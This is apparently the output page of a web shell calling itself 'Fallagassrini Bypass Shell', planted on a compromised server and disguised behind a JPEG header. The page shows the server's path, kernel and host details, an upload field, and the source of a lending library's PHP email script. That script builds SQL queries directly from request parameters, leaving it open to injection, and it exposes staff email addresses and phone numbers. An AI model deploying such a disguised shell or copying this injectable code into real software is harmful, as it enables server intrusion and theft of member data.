JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/testmail.php

<?php 
include('is_autheticated.php');

$branch=$_POST['branch'];

$book_code=$_POST['book_code'];

$member_name=$_POST['member_name'];

$text = trim($_POST['book_code']); // remove the last \n or whitespace character

$textAr = explode("\n", $text);

$textAr = array_filter($textAr, 'trim'); // remove any extra \r characters left behind

function getmember_id($member_code)
{
$ret=mysql_fetch_row(mysql_query("select id from members where member_code='".$member_code."'"));
return $ret[0];
}

function getmember_name($member_code)
{
$ret=mysql_fetch_row(mysql_query("select member_name from members where member_code='".$member_code."'"));
return $ret[0];
}

function getcheck_in($b_code)
{
$ret=mysql_fetch_row(mysql_query("select check_in_date from book_receipt where bar_code='".$b_code."'"));
return $ret[0];
}

function getcheck_out($b_code)	
{
$ret=mysql_fetch_row(mysql_query("select check_out_date from book_receipt where bar_code='".$b_code."'"));
return $ret[0];
}

function getbook_name($book_id)
{
$ret=mysql_fetch_row(mysql_query("select book_name from book where id='".$book_id."'"));
return $ret[0];
}

function getmember_email($member_code)
{
$ret=mysql_fetch_row(mysql_query("select emailid from members where member_code='".$member_code."' "));
return $ret[0];
}

$branch=$_REQUEST['branch'];
$member_code=$_REQUEST['membercode'];
$member_id=getmember_id($_REQUEST['membercode']);
$member_name=getmember_name($_REQUEST['membercode']);
$mem_email=getmember_email($_REQUEST['membercode']);
$old_due_amount=$_REQUEST['old_due_amount'];
$reading_charge=$_REQUEST['reading_charge'];
$late_charges=$_REQUEST['late_charges'];
$discount=$_REQUEST['discount'];
$due=$_REQUEST['due'];echo $due;echo "<br />";
$other_payment=$_REQUEST['other_payment'];
$total_payment=$_REQUEST['total_payment'];
$paid_amount=$_REQUEST['paid_amount'];echo $paid_amount;echo "<br />";
$new_due_amount=$_REQUEST['new_due_amount'];
$type=$_REQUEST['type'];

foreach ($textAr as $line) {

  $books=$books."','".$line;

} 
echo "select count(distinct(book_id)) as tot_books from  `check_out_in_history` where member_id='".$member_id."' and branch='".$branch."' and status='0' and check_out_date=date(Now())";echo "<br />";
$res3=mysql_query("select count(distinct(book_id)) as tot_books from  `check_out_in_history` where member_id='".$member_id."' and branch='".$branch."' and status='0' and check_out_date=date(Now())");
$branch3=mysql_fetch_array($res3);
echo $branch3['tot_books'];echo "<br />";

$res4=mysql_query("select count(distinct(book_id)) as tot_books2 from  `check_out_in_history` where member_id='".$member_id."' and branch='".$branch."' and status='1' and 	actual_check_in_date=date(Now())");echo "<br />";
$branch4=mysql_fetch_array($res4);
echo $branch4['tot_books2'];echo "<br />";exit;

$sql="select * from check_out_in_history where member_id='".$member_id."' and branch='".$branch."'";
$source=mysql_query($sql);
$step=mysql_fetch_array($source);
$bar_c=$step['book_bar_code'];
$book_name=getbook_name($step['book_id']);		
$check_in=getcheck_in($step['book_bar_code']);	
$check_out=getcheck_out($step['book_bar_code']);

/*$user_email = 'shanmugamkani1994@gmail.com';*/	
$user_email = 'support@easwarilibrary.in';							
$subject = 'Dear Mr./Ms. '.$member_name.' ';
/*$to = 'shanmugamkani1994@gmail.com';*/	
$to = $mem_email;
$eswari = 'Warm Greetings from  Easwari Lending Library !!!';
//$ccarr = 'damemember@gmail.com';
//$to = 'shanmugamkani1994@gmail.com';
	
	
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
 
// Create email headers
$headers .= 'From: '.$user_email."\r\n".
    'Reply-To: '.$user_email."\r\n" .
    'X-Mailer: PHP/' . phpversion();
if($type==1){
$message = '<html><body>';
$message .= '<p style="font-size:14px;">Dear Mr./Ms. '.$member_name.'('.$member_code.')</p>';
$message .= '<p style="color:#080;font-size:18px;">'.$eswari.'</p>';
$message .= '<p style="font-size:16px;">We confirm that you have taken the books through our team member and request you to return the books on or before due date in good condition.</p>';
$message .= '<p style="font-size:16px;">Total Number of Books Taken:'.$branch3['tot_books'].'.</p>';
$message .= '<p style="font-size:16px;">Payment Made:'.$paid_amount.'.</p>';
$message .= '<p style="font-size:16px;">Payment Due:'.$due.'.</p>';
/*$message .= '<table width="500" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">';
$message .= '<tr>';
/*$message .= '<th>'.Name.'</th>';
$message .= '<th>'.Branch.'</th>';
$message .= '<th>'.Bar .' '.Code.'</th>';
$message .= '<th>'.Book .' '.Name.'</th>';
$message .= '<th>'.CheckIn.' '.Date.'</th>'; 
$message .= '<th>'.CheckOut.' '.Date.'</th>';
/*$message .= '<th>'.OldDue .' '.Amount.'</th>';
$message .= '<th>'.Reading .' '.Charge.'</th>';
$message .= '<th>'.Late.' '.Charge.'</th>';
$message .= '<th>'.Discount.'</th>';
$message .= '<th>'.Due.'</th>';
$message .= '<th>'.Other.' '.Payment.'</th>';
$message .= '<th>'.Total.' '.Payment.'</th>';
/*$message .= '<th>'.Paid.' '.Amount.'</th>';
$message .= '<th>'.NewDue.' '.Amount.'</th>';
$message .= '</tr>';
$message .= '<tr>';
/*$message .= '<td>'.$member_name.'</td>';
$message .= '<td>'.$branch.'</td>';
$message .= '<td>'.$bar_c.'</td>';
$message .= '<td>'.$book_name.'</td>';
$message .= '<td>'.$check_in.'</td>';
$message .= '<td>'.$check_out.'</td>';
/*$message .= '<td>'.$old_due_amount.'</td>';
$message .= '<td>'.$reading_charge.'</td>';
$message .= '<td>'.$late_charge.'</td>';
$message .= '<td>'.$discount.'</td>';
$message .= '<td>'.$due.'</td>';
$message .= '<td>'.$other_payment.'</td>';
$message .= '<td>'.$total_payment.'</td>';
/*$message .= '<td>'.$paid_amount.'</td>';
$message .= '<td>'.$new_due_amount.'</td>';
$message .= '</tr>';
$message .= '</table>';*/

$message .= '<p style="font-size:14px;">You can keep in touch with our team.</p>';
$message .= '<p> <br /> </p>';
$message .= '<p> <br /> </p>';
$message .= '<p> <br /> </p>';
$message .= '<p style="font-size:14px;">With Thanks & Regards.</p>';
$message .= '<p style="font-size:14px;">Easwari Lending Library -Customer Care.</p>';
$message .= '<p style="font-size:14px;">We work around your wisdom</p>';
$message .= '<p style="font-size:14px;">Telephone: 044-42636919/28353199</p>';
$message .= '<p style="font-size:14px;">Mobile: 9840366599</p>';
$message .= '<p style="font-size:14px;">Email: support@easwarilibrary.in</p>';



$message .= '</body></html>';      
}
else
{

$message = '<html><body>';
$message .= '<p style="font-size:14px;">Dear Mr./Ms. '.$member_name.'('.$member_code.')</p>';
$message .= '<p style="color:#080;font-size:18px;">'.$eswari.'</p>';
$message .= '<p style="font-size:16px;">We confirm that we have received the books which you had returned, in good condition through our team member.</p>';
$message .= '<p style="font-size:16px;">Total Number of Books Returned:'.$branch4['tot_books2'].'.</p>';
$message .= '<p style="font-size:16px;">Payment Made:'.$paid_amount.'.</p>';
$message .= '<p style="font-size:16px;">Payment Due:'.$due.'.</p>';
/*$message .= '<table width="500" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">';
$message .= '<tr>';
/*$message .= '<th>'.Name.'</th>';
$message .= '<th>'.Branch.'</th>';
$message .= '<th>'.Bar .' '.Code.'</th>';
$message .= '<th>'.Book .' '.Name.'</th>';
$message .= '<th>'.CheckIn.' '.Date.'</th>'; 
$message .= '<th>'.CheckOut.' '.Date.'</th>';
/*$message .= '<th>'.OldDue .' '.Amount.'</th>';
$message .= '<th>'.Reading .' '.Charge.'</th>';
$message .= '<th>'.Late.' '.Charge.'</th>';
$message .= '<th>'.Discount.'</th>';
$message .= '<th>'.Due.'</th>';
$message .= '<th>'.Other.' '.Payment.'</th>';
$message .= '<th>'.Total.' '.Payment.'</th>';
/*$message .= '<th>'.Paid.' '.Amount.'</th>';
$message .= '<th>'.NewDue.' '.Amount.'</th>';
$message .= '</tr>';
$message .= '<tr>';
/*$message .= '<td>'.$member_name.'</td>';
$message .= '<td>'.$branch.'</td>';
$message .= '<td>'.$bar_c.'</td>';
$message .= '<td>'.$book_name.'</td>';
$message .= '<td>'.$check_in.'</td>';
$message .= '<td>'.$check_out.'</td>';
/*$message .= '<td>'.$old_due_amount.'</td>';
$message .= '<td>'.$reading_charge.'</td>';
$message .= '<td>'.$late_charge.'</td>';
$message .= '<td>'.$discount.'</td>';
$message .= '<td>'.$due.'</td>';
$message .= '<td>'.$other_payment.'</td>';
$message .= '<td>'.$total_payment.'</td>';
/*$message .= '<td>'.$paid_amount.'</td>';
$message .= '<td>'.$new_due_amount.'</td>';
$message .= '</tr>';
$message .= '</table>';*/

$message .= '<p style="font-size:14px;">You can keep in touch with our team.</p>';
$message .= '<p> <br /> </p>';
$message .= '<p> <br /> </p>';
$message .= '<p> <br /> </p>';
$message .= '<p style="font-size:14px;">With Thanks & Regards.</p>';
$message .= '<p style="font-size:14px;">Easwari Lending Library -Customer Care.</p>';
$message .= '<p style="font-size:14px;">We work around your wisdom</p>';
$message .= '<p style="font-size:14px;">Telephone: 044-42636919/28353199</p>';
$message .= '<p style="font-size:14px;">Mobile: 9840366599</p>';
$message .= '<p style="font-size:14px;">Email: support@easwarilibrary.in</p>';



$message .= '</body></html>';      
}
       if(mail($to, $subject, $message, $headers, $from ))
        {
            echo 'Your mail has been sent successfully.';
        }
        else
        {
             echo 'Unable to send email. Please try again.';
        }

		
 ?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net